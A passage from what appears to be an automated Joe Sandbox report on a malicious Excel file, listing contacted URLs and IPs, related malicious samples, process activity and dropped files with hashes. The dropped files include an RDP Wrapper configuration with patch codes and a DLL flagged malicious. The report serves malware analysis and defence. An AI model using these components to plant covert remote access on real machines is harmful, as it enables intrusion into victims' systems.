                                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                    high
                                                                                                    https://management.azure.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnostics.office.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                        high
                                                                                                        https://clients.config.office.net/user/v1.0/ios1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                          high
                                                                                                          https://insertmedia.bing.office.net/odc/insertmedia1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                            high
                                                                                                            https://o365auditrealtimeingestion.manage.office.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office365.com/api/v1.0/me/Activities1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                high
                                                                                                                https://api.office.net1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                  high
                                                                                                                  https://incidents.diagnosticssdf.office.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                    high
                                                                                                                    https://asgsmsproxyapi.azurewebsites.net/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://clients.config.office.net/user/v1.0/android/policies1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                      high
                                                                                                                      https://entitlement.diagnostics.office.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                        high
                                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                          high
                                                                                                                          https://outlook.office.com/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                            high
                                                                                                                            https://storage.live.com/clientlogs/uploadlocation1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                              high
                                                                                                                              https://templatelogging.office.com/client/log1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                high
                                                                                                                                https://outlook.office365.com/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://webshell.suite.office.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://management.azure.com/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://ncus-000.contentsync.1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://login.windows.net/common/oauth2/authorize1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://graph.windows.net/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://api.powerbi.com/beta/myorg/imports1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://devnull.onenote.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://messaging.office.com/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://contentstorage.omex.office.net/addinclassifier/officeentities1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://augloop.office.com/v21C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://skyapi.live.net/Activity/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown

                                                                                                                                                            Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            192.185.236.165
                                                                                                                                                            unknownUnited States
                                                                                                                                                            46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                            37.46.150.86
                                                                                                                                                            unknownMoldova Republic of
                                                                                                                                                            8758IWAYCHfalse

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                            Analysis ID:337287
                                                                                                                                                            Start date:08.01.2021
                                                                                                                                                            Start time:09:32:31
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 11m 18s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:light
                                                                                                                                                            Sample file name:Telex06012020.xls
                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                                                            Number of analysed new started processes analysed:35
                                                                                                                                                            Number of new started drivers analysed:3
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.phis.troj.spyw.expl.evad.winXLS@25/31@1/2
                                                                                                                                                            EGA Information:Failed
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 38.9% (good quality ratio 11.2%)
                                                                                                                                                            • Quality average: 20.5%
                                                                                                                                                            • Quality standard deviation: 34.4%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 87%
                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Found application associated with file extension: .xls
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer
                                                                                                                                                            Warnings:
                                                                                                                                                            Show All
                                                                                                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.12.23, 52.109.8.24, 104.43.193.48, 51.11.168.160, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.142.210, 52.155.217.156, 13.64.90.137, 20.54.26.129, 52.255.188.83
                                                                                                                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            09:34:46API Interceptor49x Sleep call for process: powershell.exe modified
                                                                                                                                                            09:35:06API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                            09:35:19API Interceptor591x Sleep call for process: cmd.exe modified

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            No context

                                                                                                                                                            Domains

                                                                                                                                                            No context

                                                                                                                                                            ASN

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            IWAYCHul9kpUwYel.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            Payment Documents.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            Payment Documents.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            AdviceSlip.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            Export Order Vene.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.139
                                                                                                                                                            SimpNet.shGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.238
                                                                                                                                                            Rr0veY2Ho5.exeGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.211
                                                                                                                                                            product_qoute_6847684898.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.211
                                                                                                                                                            EjtRDKZNkXWoLTE.exeGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.60
                                                                                                                                                            ru7co.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.60
                                                                                                                                                            http://37.46.150.184/high/imanGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.184
                                                                                                                                                            SWIFT-MTC749892-10-12-20_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.41
                                                                                                                                                            SWIFT COPY.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 37.46.150.41
                                                                                                                                                            UNIFIEDLAYER-AS-1USul9kpUwYel.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.194.191
                                                                                                                                                            ______.docGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.151.24
                                                                                                                                                            ______.docGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.151.24
                                                                                                                                                            http://0620218.unfreezegrowers.com/bGVhaC5oZWl0bmVyQGV4cC5jb20=Get hashmaliciousBrowse
                                                                                                                                                            • 162.241.175.181
                                                                                                                                                            http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.comGet hashmaliciousBrowse
                                                                                                                                                            • 50.87.150.0
                                                                                                                                                            https://1drv.ms/u/s!AmqlOnt-7_dxdENKsoSwOCjxG_Q?e=3ZrXeGGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.127.190
                                                                                                                                                            https://cypressbayhockey.com/NOGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.120.89
                                                                                                                                                            https://pdfsharedmessage.xtensio.com/7wtcdltaGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.246.23
                                                                                                                                                            form.docGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.148.243
                                                                                                                                                            RFQPO90865802ICONME.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.131.105
                                                                                                                                                            Ekz Payment.htmGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.196.146
                                                                                                                                                            http://moneypay.best/Get hashmaliciousBrowse
                                                                                                                                                            • 192.232.250.4
                                                                                                                                                            https://canningelectricinc.wordpress.com/Get hashmaliciousBrowse
                                                                                                                                                            • 192.185.188.96
                                                                                                                                                            Lmcgrath - FAX_ALNRSUW.htmlGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.29.156
                                                                                                                                                            Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.141.199
                                                                                                                                                            W08347.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.117.218
                                                                                                                                                            https://datetheright1.com/damn/sharepoint%20newGet hashmaliciousBrowse
                                                                                                                                                            • 162.144.40.98
                                                                                                                                                            http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/Get hashmaliciousBrowse
                                                                                                                                                            • 162.241.101.253
                                                                                                                                                            8G9b9FXspm.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.219.113
                                                                                                                                                            Nuevo pedido.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.131.105

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            No context

                                                                                                                                                            Dropped Files

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            C:\Program Files\Microsoft DN1\sqlmap.dllOrder Inquiry.exeGet hashmaliciousBrowse
                                                                                                                                                              New Order.exeGet hashmaliciousBrowse
                                                                                                                                                                PR E-2012513 SMT PART SUPPLY.xlsx.exeGet hashmaliciousBrowse
                                                                                                                                                                  xVngcLqeWG.exeGet hashmaliciousBrowse
                                                                                                                                                                    9By1j8TSMG.exeGet hashmaliciousBrowse
                                                                                                                                                                      SecuriteInfo.com.Trojan.DownLoader36.28619.2173.exeGet hashmaliciousBrowse
                                                                                                                                                                        Parcel_Slip_&_Address_Form.xlsGet hashmaliciousBrowse
                                                                                                                                                                          SecuriteInfo.com.Trojan.PWS.Maria.4.28965.exeGet hashmaliciousBrowse
                                                                                                                                                                            SecuriteInfo.com.Troj.XMLDwn-AS.10120.rtfGet hashmaliciousBrowse
                                                                                                                                                                              newbinx.exeGet hashmaliciousBrowse
                                                                                                                                                                                my_client_specification.exeGet hashmaliciousBrowse
                                                                                                                                                                                  Listings of Items pdf Specifications pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    Purchasing Order.exeGet hashmaliciousBrowse
                                                                                                                                                                                      Order #DCF 465789.exeGet hashmaliciousBrowse
                                                                                                                                                                                        uPg8j4T6A9.exeGet hashmaliciousBrowse
                                                                                                                                                                                          New order samples #8495.exeGet hashmaliciousBrowse
                                                                                                                                                                                            xE08uG0aqO.exeGet hashmaliciousBrowse
                                                                                                                                                                                              OfRRJlmMtZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                PO-HH00890.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  Po Shkm120022019 order confirmation.exeGet hashmaliciousBrowse

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    C:\Program Files\Microsoft DN1\rdpwrap.ini
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):181846
                                                                                                                                                                                                    Entropy (8bit):5.421809355655133
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:WEUfQYczxEQBLWf9PUupBdfbQnxJcRZsMFdKlax8Rr/d6gl/+f8jZ0fyL+8F7f6/:57f6GqZm0c11IvimstYUWtN/7
                                                                                                                                                                                                    MD5:6BC395161B04AA555D5A4E8EB8320020
                                                                                                                                                                                                    SHA1:F18544FAA4BD067F6773A373D580E111B0C8C300
                                                                                                                                                                                                    SHA-256:23390DFCDA60F292BA1E52ABB5BA2F829335351F4F9B1D33A9A6AD7A9BF5E2BE
                                                                                                                                                                                                    SHA-512:679AC80C26422667CA5F2A6D9F0E022EF76BC9B09F97AD390B81F2E286446F0658524CCC8346A6E79D10E42131BC428F7C0CE4541D44D83AF8134C499436DAAE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2020-08-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM
                                                                                                                                                                                                    C:\Program Files\Microsoft DN1\sqlmap.dll
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):116736
                                                                                                                                                                                                    Entropy (8bit):5.884975745255681
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                                                                                                                                                                    MD5:461ADE40B800AE80A40985594E1AC236
                                                                                                                                                                                                    SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                                                                                                                                                                    SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                                                                                                                                                                    SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 22%, Browse
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: Order Inquiry.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: PR E-2012513 SMT PART SUPPLY.xlsx.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: xVngcLqeWG.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: 9By1j8TSMG.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: SecuriteInfo.com.Trojan.DownLoader36.28619.2173.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Parcel_Slip_&_Address_Form.xls, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: SecuriteInfo.com.Trojan.PWS.Maria.4.28965.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: SecuriteInfo.com.Troj.XMLDwn-AS.10120.rtf, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: newbinx.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: my_client_specification.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Listings of Items pdf Specifications pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Purchasing Order.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Order #DCF 465789.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: uPg8j4T6A9.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: New order samples #8495.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: xE08uG0aqO.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: OfRRJlmMtZ.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: PO-HH00890.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Po Shkm120022019 order confirmation.exe, Detection: malicious, Browse
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1C667E71-DE7F-40D0-8C7D-A76533AF53EA
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):132942
                                                                                                                                                                                                    Entropy (8bit):5.372926648458861
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:3cQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:LrQ9DQW+zBX8P
                                                                                                                                                                                                    MD5:4FB01D7787238629B8BF2AA75C08D807
                                                                                                                                                                                                    SHA1:DEAE2DBA4C6F585F32C0E6CD15BD11A31274FEBE
                                                                                                                                                                                                    SHA-256:AB8E2FD0CBF3A2812608DFC51931E9F6C1E077E4DE95C436EDEA3DBA6864D591
                                                                                                                                                                                                    SHA-512:DE25EE4713B5A504958F506E8E4A462C3473FD043ABCA86673BD3492559EFE7CFF09A3D1187D76B754D20EB20EBAD95E76EB2DC67A2333E8427922AF02ACE8DC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-08T08:34:22">.. Build: 16.0.13706.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):33555
                                                                                                                                                                                                    Entropy (8bit):5.023679594333714
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:O8V3IpNBQkj2Yh4iUxZvlard3TFn6/zFtFgVx1UtRj7vioBnPVe7oZnlkOdBWtA1:O8V3CNBQkj2Yh4iUx3qdD56/zFzgVx1m
                                                                                                                                                                                                    MD5:2C3F440BB2D620A7675D27766C2ABD6A
                                                                                                                                                                                                    SHA1:27F427EF4C5D526444D4523DBCFE6709573B8333
                                                                                                                                                                                                    SHA-256:604F8DA3B31E7C8D88190AEDBA23C9106A8140E1AB74453640111643058B7BA2
                                                                                                                                                                                                    SHA-512:76C485F298B00A47FABBF1E9A8424A21806EADFC46C9FA347E18BD37D8F55B07C4FF8517217FAF0BB2C5353636D5D91F05348BDCD604B7D6511845E20444AD70
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: PSMODULECACHE.#...........q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........+......C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):21540
                                                                                                                                                                                                    Entropy (8bit):5.462653171685211
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:DtL6Et8lxH09tpSYsJu0iQeZUn1u16zqymHKHVQ39ZjaIvUI++j/:r8zHY3psJu/pC3qj+GH2ly
                                                                                                                                                                                                    MD5:294D364B13240176AB7602CE356D363A
                                                                                                                                                                                                    SHA1:44465063D48270132CFC557DEDFCC253B5932DEB
                                                                                                                                                                                                    SHA-256:5FCDC94212A1D4190D40652D17EB163C15D71FC72E1D7206E731172BFA6F26DB
                                                                                                                                                                                                    SHA-512:8EE5DF0B3DEA5726070DFC87B114A2CE177642800F6DECB603E678F943D65899AEEAD1051F801C54DE12C6362CBDDC858D78CF6EB860AC6EBD0AA30AE5989891
                                                                                                                                                                                                    Malicious:false
